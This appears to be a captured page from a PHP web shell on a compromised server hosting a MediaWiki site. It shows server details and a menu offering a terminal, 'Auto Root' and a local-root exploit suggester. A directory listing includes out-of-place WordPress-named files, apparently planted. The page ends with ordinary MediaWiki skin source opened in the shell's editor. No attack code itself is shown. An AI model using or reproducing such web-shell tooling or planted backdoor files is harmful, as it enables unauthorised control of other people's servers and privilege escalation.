Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
wiki.bernardino.org /
skins /
Delete
Unzip
Name
Size
Permission
Date
Action
1
[ DIR ]
drwxr-xr-x
2012-04-25 19:52
CologneBlue
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
Modern
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
MonoBook
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
Vector
[ DIR ]
drwxr-xr-x
2016-11-28 20:21
chick
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
cologneblue
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
common
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
modern
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
monobook
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
myskin
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
nostalgia
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
simple
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
vector
[ DIR ]
drwxr-xr-x
2012-03-22 16:23
.htaccess
197
B
-r--r--r--
2026-08-22 08:29
Chick.deps.php
503
B
-rw-r--r--
2008-03-11 17:29
Chick.php
934
B
-rw-r--r--
2011-08-06 14:07
CologneBlue.php
10.27
KB
-rw-r--r--
2011-11-24 17:27
Modern.deps.php
452
B
-rw-r--r--
2008-03-11 17:29
Modern.php
4.08
KB
-rw-r--r--
2011-09-08 00:07
MonoBook.deps.php
453
B
-rw-r--r--
2008-03-11 17:29
MonoBook.php
9.23
KB
-rw-r--r--
2011-10-26 20:47
MySkin.deps.php
504
B
-rw-r--r--
2008-03-11 17:29
MySkin.php
434
B
-rw-r--r--
2009-09-22 18:52
Nostalgia.php
3.04
KB
-rw-r--r--
2011-08-06 14:07
README
1.18
KB
-rw-r--r--
2016-11-28 20:20
Simple.deps.php
504
B
-rw-r--r--
2008-03-11 17:29
Simple.php
1.22
KB
-rw-r--r--
2011-09-21 00:36
Standard.php
8.15
KB
-rw-r--r--
2011-10-20 23:22
Vector.deps.php
452
B
-rw-r--r--
2009-05-30 22:02
Vector.php
14.94
KB
-rw-r--r--
2011-10-26 20:47
wp-blog-header.php
2.74
KB
-r--r--r--
2026-08-22 08:29
wp-cron.php
2.74
KB
-rw-r--r--
2026-08-22 08:29
Save
Rename
<?php /** * Standard (a.k.a. Classic) skin: old MediaWiki default skin * * @file * @ingroup Skins */ if( !defined( 'MEDIAWIKI' ) ) { die( -1 ); } /** * @todo document * @ingroup Skins */ class SkinStandard extends SkinLegacy { var $skinname = 'standard', $stylename = 'standard', $template = 'StandardTemplate'; function setupSkinUserCss( OutputPage $out ){ parent::setupSkinUserCss( $out ); $out->AddModuleStyles( 'skins.standard' ); $qb = $this->qbSetting(); $rules = array(); if ( 2 == $qb ) { # Right $rules[] = "/* @noflip */#quickbar { position: absolute; top: 4px; right: 4px; border-left: 2px solid #000000; }"; $rules[] = "/* @noflip */#article, #mw-data-after-content { margin-left: 4px; margin-right: 152px; }"; $rules[] = "/* @noflip */#topbar, #footer { margin-right: 152px; }"; } elseif ( 1 == $qb || 3 == $qb ) { $rules[] = "/* @noflip */#quickbar { position: absolute; top: 4px; left: 4px; border-right: 1px solid gray; }"; $rules[] = "/* @noflip */#article, #mw-data-after-content { margin-left: 152px; margin-right: 4px; }"; $rules[] = "/* @noflip */#topbar, #footer { margin-left: 152px; }"; if( 3 == $qb ) { $rules[] = "/* @noflip */#quickbar { position: fixed; padding: 4px; }"; } } elseif ( 4 == $qb ) { $rules[] = "/* @noflip */#quickbar { position: fixed; right: 0px; top: 0px; padding: 4px;}"; $rules[] = "/* @noflip */#quickbar { border-right: 1px solid gray; }"; $rules[] = "/* @noflip */#article, #mw-data-after-content { margin-right: 152px; margin-left: 4px; }"; $rules[] = "/* @noflip */#topbar, #footer { margin-right: 152px; }"; } $style = implode( "\n", $rules ); $out->addInlineStyle( $style, 'flip' ); } } class StandardTemplate extends LegacyTemplate { function doAfterContent() { global $wgContLang, $wgLang; wfProfileIn( __METHOD__ ); wfProfileIn( __METHOD__ . '-1' ); $s = "\n</div><br style=\"clear:both\" />\n"; $s .= "\n<div id='footer'>"; $s .= '<table border="0" cellspacing="0"><tr>'; wfProfileOut( __METHOD__ . '-1' ); wfProfileIn( __METHOD__ . '-2' ); $l = $this->getSkin()->getLang()->alignStart(); $s .= "<td class='bottom' align='$l' valign='top'>"; $s .= $this->bottomLinks(); $s .= "\n<br />" . $wgLang->pipeList( array( $this->getSkin()->mainPageLink(), $this->getSkin()->aboutLink(), Linker::specialLink( 'Recentchanges' ), $this->searchForm() ) ) . '<br /><span id="pagestats">' . $this->pageStats() . '</span>'; $s .= '</td>'; $s .= "</tr></table>\n</div>\n</div>\n"; wfProfileOut( __METHOD__ . '-2' ); wfProfileIn( __METHOD__ . '-3' ); if ( $this->getSkin()->qbSetting() != 0 ) { $s .= $this->quickBar(); } wfProfileOut( __METHOD__ . '-3' ); wfProfileOut( __METHOD__ ); return $s; } function quickBar() { global $wgOut, $wgUser, $wgRequest, $wgContLang; wfProfileIn( __METHOD__ ); $action = $wgRequest->getText( 'action' ); $wpPreview = $wgRequest->getBool( 'wpPreview' ); $tns = $this->getSkin()->getTitle()->getNamespace(); $s = "\n<div id='quickbar'>"; $s .= "\n" . $this->getSkin()->logoText() . "\n<hr class='sep' />"; $sep = "\n<br />"; # Use the first heading from the Monobook sidebar as the "browse" section $bar = $this->getSkin()->buildSidebar(); unset( $bar['SEARCH'] ); unset( $bar['LANGUAGES'] ); unset( $bar['TOOLBOX'] ); $barnumber = 1; foreach ( $bar as $browseLinks ) { if ( is_array( $browseLinks ) ) { if ( $barnumber > 1 ) { $s .= "\n<hr class='sep' />"; } foreach ( $browseLinks as $link ) { if ( $link['text'] != '-' ) { $s .= "<a href=\"{$link['href']}\">" . htmlspecialchars( $link['text'] ) . '</a>' . $sep; } } } if ( $barnumber == 1 ) { // only show watchlist link if logged in if( $wgUser->isLoggedIn() ) { $s.= Linker::specialLink( 'Watchlist' ) ; $s .= $sep . Linker::linkKnown( SpecialPage::getTitleFor( 'Contributions' ), wfMsg( 'mycontris' ), array(), array( 'target' => $wgUser->getName() ) ); } } $barnumber = $barnumber + 1; } $s .= "\n<hr class='sep' />"; $articleExists = $this->getSkin()->getTitle()->getArticleId(); if ( $wgOut->isArticle() || $action == 'edit' || $action == 'history' || $wpPreview ) { if( $wgOut->isArticle() ) { $s .= '<strong>' . $this->editThisPage() . '</strong>'; } else { # backlink to the article in edit or history mode if( $articleExists ){ # no backlink if no article switch( $tns ) { case NS_TALK: case NS_USER_TALK: case NS_PROJECT_TALK: case NS_FILE_TALK: case NS_MEDIAWIKI_TALK: case NS_TEMPLATE_TALK: case NS_HELP_TALK: case NS_CATEGORY_TALK: $text = wfMsg('viewtalkpage'); break; case NS_MAIN: $text = wfMsg( 'articlepage' ); break; case NS_USER: $text = wfMsg( 'userpage' ); break; case NS_PROJECT: $text = wfMsg( 'projectpage' ); break; case NS_FILE: $text = wfMsg( 'imagepage' ); break; case NS_MEDIAWIKI: $text = wfMsg( 'mediawikipage' ); break; case NS_TEMPLATE: $text = wfMsg( 'templatepage' ); break; case NS_HELP: $text = wfMsg( 'viewhelppage' ); break; case NS_CATEGORY: $text = wfMsg( 'categorypage' ); break; default: $text = wfMsg( 'articlepage' ); } $link = $this->getSkin()->getTitle()->getText(); $nstext = $wgContLang->getNsText( $tns ); if( $nstext ) { # add namespace if necessary $link = $nstext . ':' . $link; } $s .= Linker::link( Title::newFromText( $link ), $text ); } elseif( $this->getSkin()->getTitle()->getNamespace() != NS_SPECIAL ) { # we just throw in a "New page" text to tell the user that he's in edit mode, # and to avoid messing with the separator that is prepended to the next item $s .= '<strong>' . wfMsg( 'newpage' ) . '</strong>'; } } # "Post a comment" link if( ( $this->getSkin()->getTitle()->isTalkPage() || $wgOut->showNewSectionLink() ) && $action != 'edit' && !$wpPreview ) $s .= '<br />' . $this->getSkin()->link( $this->getSkin()->getTitle(), wfMsg( 'postcomment' ), array(), array( 'action' => 'edit', 'section' => 'new' ), array( 'known', 'noclasses' ) ); /* watching could cause problems in edit mode: if user edits article, then loads "watch this article" in background and then saves article with "Watch this article" checkbox disabled, the article is transparently unwatched. Therefore we do not show the "Watch this page" link in edit mode */ if ( $wgUser->isLoggedIn() && $articleExists ) { if( $action != 'edit' && $action != 'submit' ) { $s .= $sep . $this->watchThisPage(); } if ( $this->getSkin()->getTitle()->userCan( 'edit' ) ) $s .= $sep . $this->moveThisPage(); } if ( $wgUser->isAllowed( 'delete' ) && $articleExists ) { $s .= $sep . $this->deleteThisPage() . $sep . $this->protectThisPage(); } $s .= $sep . $this->talkLink(); if( $articleExists && $action != 'history' ) { $s .= $sep . $this->historyLink(); } $s .= $sep . $this->whatLinksHere(); if( $wgOut->isArticleRelated() ) { $s .= $sep . $this->watchPageLinksLink(); } if ( NS_USER == $this->getSkin()->getTitle()->getNamespace() || $this->getSkin()->getTitle()->getNamespace() == NS_USER_TALK ) { $id = User::idFromName( $this->getSkin()->getTitle()->getText() ); $ip = User::isIP( $this->getSkin()->getTitle()->getText() ); if( $id || $ip ){ $s .= $sep . $this->userContribsLink(); } if( $this->getSkin()->showEmailUser( $id ) ) { $s .= $sep . $this->emailUserLink(); } } $s .= "\n<br /><hr class='sep' />"; } if( UploadBase::isEnabled() && UploadBase::isAllowed( $wgUser ) === true ) { $s .= $this->getUploadLink() . $sep; } $s .= Linker::specialLink( 'Specialpages' ); global $wgSiteSupportPage; if( $wgSiteSupportPage ) { $s .= "\n<br /><a href=\"" . htmlspecialchars( $wgSiteSupportPage ) . '" class="internal">' . wfMsg( 'sitesupport' ) . '</a>'; } $s .= "\n<br /></div>\n"; wfProfileOut( __METHOD__ ); return $s; } }